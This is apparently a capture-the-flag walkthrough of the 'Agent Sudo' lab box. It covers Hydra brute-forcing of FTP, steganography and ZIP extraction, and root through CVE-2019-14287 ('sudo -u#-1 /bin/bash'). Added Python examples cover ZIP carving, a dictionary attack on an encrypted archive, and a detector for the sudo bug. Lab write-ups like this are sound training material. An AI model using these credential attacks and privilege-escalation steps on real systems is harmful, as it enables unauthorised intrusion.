Agent SUDO
HYDRA
- We were able to brute-force the FTP credentials of the user chris with Hydra.
- Result: chris:crystal
[DATA] attacking ftp://10.10.2.168:21/
[21][ftp] host: 10.10.2.168 login: chris password: crystal
FTP
- We can log in to FTP as chris:crystal.
- The note To_agentJ.txt states that a password is hidden inside one of the images [cute-alien.jpg, cutie.png].
- We can download these images and examine them further using Binwalk and Stegseek.
Connected to 10.10.2.168.
220 (vsFTPd 3.0.3)
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
ftp> get To_agentJ.txt -
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory.
Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
ftp> mget cute-alien.jpg cutie.png
BINWALK - JOHN
- We can view and extract the hidden content of the files found during FTP enumeration using Binwalk.
- Hidden ZIP inside [cutie.png]: the archive is appended after the PNG data, so Binwalk reports it at a non-zero offset.
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
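The Binwalk step above finds the archive by signature scanning. The following added example (not code from the writeup or from Binwalk) reproduces that result with the standard library: it walks the PNG chunks to IEND, then parses the ZIP local file header that follows so the fields it reports (offset, encrypted flag, sizes, name) line up with the columns in the Binwalk output. The cover PNG, the appended archive and its note are constructed in memory here; the sample archive is unencrypted, unlike the one on the box.

```python
"""Locate and describe a ZIP appended after a PNG's IEND chunk (what Binwalk reported)."""
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_SIG = b"PK\x03\x04"
NOTE = b"Agent C,\nWe need to send the picture to 'QXJlYTUx' as soon as possible!\n"  # constructed


def _png_chunk(ctype, data):
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_cover_png():
    """Minimal valid 1x1 8-bit grayscale PNG standing in for the 'fake picture'."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    return PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")


def build_hidden_zip(name, data):
    """Sample archive (unencrypted; the one on the box was password-protected)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def png_end_offset(blob):
    """Offset just past the IEND chunk; anything after it is not part of the image."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        pos += 12 + length  # 4 length + 4 type + data + 4 crc
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk")


def describe_trailing_zip(blob):
    """Parse ZIP local file headers found after IEND, like Binwalk's signature lines.

    Assumes sizes are present in the local header (no data descriptor), which
    holds for archives written to a seekable file.
    """
    entries = []
    pos = blob.find(ZIP_LOCAL_SIG, png_end_offset(blob))
    while pos != -1:
        flags, method, _t, _d, crc, csize, usize, nlen, xlen = struct.unpack(
            "<HHHHIIIHH", blob[pos + 6:pos + 30])
        name = blob[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        entries.append({"offset": pos, "encrypted": bool(flags & 1), "method": method,
                        "crc": crc, "compressed_size": csize, "uncompressed_size": usize,
                        "name": name})
        pos = blob.find(ZIP_LOCAL_SIG, pos + 30 + nlen + xlen + csize)
    return entries


if __name__ == "__main__":
    image = build_cover_png() + build_hidden_zip("To_agentR.txt", NOTE)
    for e in describe_trailing_zip(image):
        print(f"{e['offset']:<8} {e['offset']:#08x} Zip archive data, "
              f"{'encrypted, ' if e['encrypted'] else ''}compressed size: {e['compressed_size']}, "
              f"uncompressed size: {e['uncompressed_size']}, name: {e['name']}")
```

On a real file you would read the bytes with `open(path, "rb").read()` and slice from the reported offset to carve the archive, which is what `binwalk -e` does for you.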
- The extracted ZIP is password protected. We can convert it to a hash with zip2john and brute-force it with John. - Password: alien
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
alien (Agent.zip/To_agentR.txt)
- Opening the ZIP we find a note from Agent R to Agent C. The note contains a Base64-encoded string. - Encoded text: QXJlYTUx ➜ Area51
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
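The zip2john + John step is a dictionary attack: each candidate password is tried until one decrypts the entry. The following is an added example, not code from the writeup or from John the Ripper, that runs that loop with the standard library. The archive and wordlist are constructed in memory. One caveat: the John output above shows the real Agent.zip used WinZip AES (PBKDF2-SHA1), which `zipfile` cannot decrypt, so the sample archive uses legacy ZipCrypto, the only scheme `zipfile` supports; the 12-byte header check byte and the CRC are what make a wrong guess fail quickly.

```python
"""Dictionary attack on a ZipCrypto-protected ZIP built in memory."""
import io
import struct
import zipfile
import zlib

ENTRY_NAME = "To_agentR.txt"
SECRET_NOTE = b"Agent C,\nWe need to send the picture to 'QXJlYTUx' as soon as possible!\nBy,\nAgent R\n"
PASSWORD = b"alien"
WORDLIST = ["123456", "password", "area51", "alien", "hackerrules!"]  # constructed, not rockyou


def _crc_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = _crc_table()


class ZipCrypto:
    """Traditional PKWARE stream cipher: three 32-bit keys seeded from the password."""

    def __init__(self, pwd):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for c in pwd:
            self._update(c)

    def _update(self, c):
        self.k0 = (self.k0 >> 8) ^ CRC_TABLE[(self.k0 ^ c) & 0xFF]
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ CRC_TABLE[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def encrypt(self, plain):
        out = bytearray()
        for c in plain:
            k = self.k2 | 2
            out.append(c ^ (((k * (k ^ 1)) >> 8) & 0xFF))
            self._update(c)  # keys advance on the plaintext byte
        return bytes(out)


def build_encrypted_zip(name, data, pwd):
    """Single stored entry, ZipCrypto-encrypted, with a consistent central directory."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 filler bytes then the CRC's high byte, which an
    # unzipper checks before touching the data (fixed filler is fine for a sample).
    body = ZipCrypto(pwd).encrypt(bytes(11) + bytes([crc >> 24]) + data)
    fname = name.encode()
    flags, stored, dos_time, dos_date = 1, 0, 0, 0x21  # bit 0 = encrypted; 1980-01-01
    local = struct.pack("<4sBBHHHHIIIHH", b"PK\x03\x04", 20, 0, flags, stored, dos_time,
                        dos_date, crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<4sBBBBHHHHIIIHHHHHII", b"PK\x01\x02", 20, 0, 20, 0, flags, stored,
                          dos_time, dos_date, crc, len(body), len(data), len(fname),
                          0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central),
                       len(local) + len(body), 0)
    return local + body + central + eocd


def crack_zip(zip_bytes, candidates):
    """Return (password, plaintext) for the first candidate that decrypts, else (None, None)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        target = zf.infolist()[0]
        for cand in candidates:
            try:
                return cand, zf.read(target, pwd=cand.encode())
            except (RuntimeError, zipfile.BadZipFile):
                continue  # RuntimeError: header check byte mismatch; BadZipFile: CRC mismatch
    return None, None


if __name__ == "__main__":
    pwd, text = crack_zip(build_encrypted_zip(ENTRY_NAME, SECRET_NOTE, PASSWORD), WORDLIST)
    print(pwd, text.decode() if text else None)
```

The check byte rejects 255 of 256 wrong guesses before any data is read, which is why legacy ZIP cracking is so cheap; AES-protected archives like Agent.zip need a PBKDF2 derivation per guess, which is the cost John reports in its hash-format line.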
STEGSEEK
- Hidden text inside [cute-alien.jpg]: we can use Stegseek to brute-force the passphrase and extract the file contents, or we can use the previously decoded Base64 text, which is the passphrase. - Passphrase: Area51
[i] Found passphrase: "Area51"
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".
Hi 'james',
Glad you find this message. Your login password is 'hackerrules!'
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
- There are credentials inside message.txt
- SSH credentials: james:hackerrules!
Privilege Escalation
- Using the SSH credentials to log in: james:hackerrules!
james@agent-sudo: ~$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
- CVE-2019-14287: in sudo versions before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID.
- The sudoers entry below is exactly that shape: james may run /bin/bash as any user except root.
james@agent-sudo: ~$ sudo -l
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
james@agent-sudo: ~$
james@agent-sudo: ~$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
- Invoking sudo with a crafted user ID: the !root exclusion only rejects uid 0, so -u#-1 (equivalently -u#4294967295) passes the policy check, while setresuid(2) treats -1 as "leave unchanged", so the shell keeps the uid 0 that sudo itself runs with. Only the uid is affected; the gid stays james, as the id output shows.
james@agent-sudo: ~$ sudo -u#-1 /bin/bash
root@agent-sudo: ~$ id
uid=0(root) gid=1000(james) groups=1000(james)
root@agent-sudo: whoami
root
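The escalation above depends on three things: a sudo version before 1.8.28, a Runas rule of the form (ALL, !root), and the way -1 is handled by the policy check versus setresuid(2). The following added example, not code from the writeup or the sudo project, checks the first two from `sudo -V` and `sudo -l` text, models the third in simulate() (a simplified model of sudo's behaviour, including the 1.8.28 fix), and flags the tell-tale runas value in sudo log lines. All input text is constructed here rather than captured from the box, and the USER= field format of the sample log lines is an assumption.

```python
"""Audit and model CVE-2019-14287 (sudo < 1.8.28, Runas ALL with a !root exclusion)."""
import re

# Constructed sample inputs (typed in to mirror the box, not captured from it).
SUDO_VERSION_OUTPUT = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SUDO_L_OUTPUT = """\
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
"""
AUTH_LOG = [  # constructed; USER= field format assumed
    "Oct 29 12:00:01 agent-sudo sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=#-1 ; COMMAND=/bin/bash",
    "Oct 29 12:00:02 agent-sudo sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=bob ; COMMAND=/bin/bash",
]

FIXED_IN = (1, 8, 28)
UID_MAX = 0xFFFFFFFF  # uid_t is unsigned 32-bit, so -1 is stored as 4294967295
RUNAS_RE = re.compile(r"^\s*\(\s*ALL\s*,\s*!root\s*\)\s*(?:NOPASSWD:\s*)?(\S.*)$")


def parse_sudo_version(text):
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def version_vulnerable(text):
    v = parse_sudo_version(text)
    return v is not None and v < FIXED_IN


def exposed_commands(sudo_l_text):
    """Commands runnable as any user except root: the rule shape the bug abuses."""
    hits = []
    for line in sudo_l_text.splitlines():
        m = RUNAS_RE.match(line)
        if m:
            hits.append(m.group(1).strip())
    return hits


def parse_runas_uid(spec):
    """sudo -u#<n>: the number is taken as a numeric id and stored in a uid_t."""
    return int(spec.lstrip("#")) & UID_MAX


def simulate(spec, patched=False):
    """Which uid a (ALL, !root) /bin/bash ends up with (simplified model of sudo)."""
    uid = parse_runas_uid(spec)
    if patched and uid == UID_MAX:
        return "rejected: invalid user id"  # 1.8.28 and later refuse -1 / 4294967295
    if uid == 0:
        return "denied by !root"            # the exclusion only matches uid 0
    # setresuid(2) treats (uid_t)-1 as "leave unchanged"; sudo runs as root, so uid 0 remains
    final_uid = 0 if uid == UID_MAX else uid
    return f"runs as uid {final_uid}"


def suspicious_sudo_log_lines(lines):
    """Flag sudo log entries whose runas user is the -1 / 4294967295 sentinel."""
    suspect = {"#-1", f"#{UID_MAX}"}
    hits = []
    for line in lines:
        m = re.search(r"USER=(\S+)\s*;", line)
        if m and m.group(1) in suspect:
            hits.append(line)
    return hits


if __name__ == "__main__":
    print("sudo vulnerable:", version_vulnerable(SUDO_VERSION_OUTPUT))
    print("exposed via (ALL, !root):", exposed_commands(SUDO_L_OUTPUT))
    for spec in ("#0", "#1001", "#-1", "#4294967295"):
        print(spec, "->", simulate(spec), "| patched:", simulate(spec, patched=True))
    print("suspicious log lines:", suspicious_sudo_log_lines(AUTH_LOG))
```

On a live host, feed `sudo -V` and `sudo -l` output into these functions; the fix is to upgrade sudo to 1.8.28 or later, and in any case to avoid (ALL, !root) style rules, since excluding one user from ALL is a blacklist rather than a least-privilege grant.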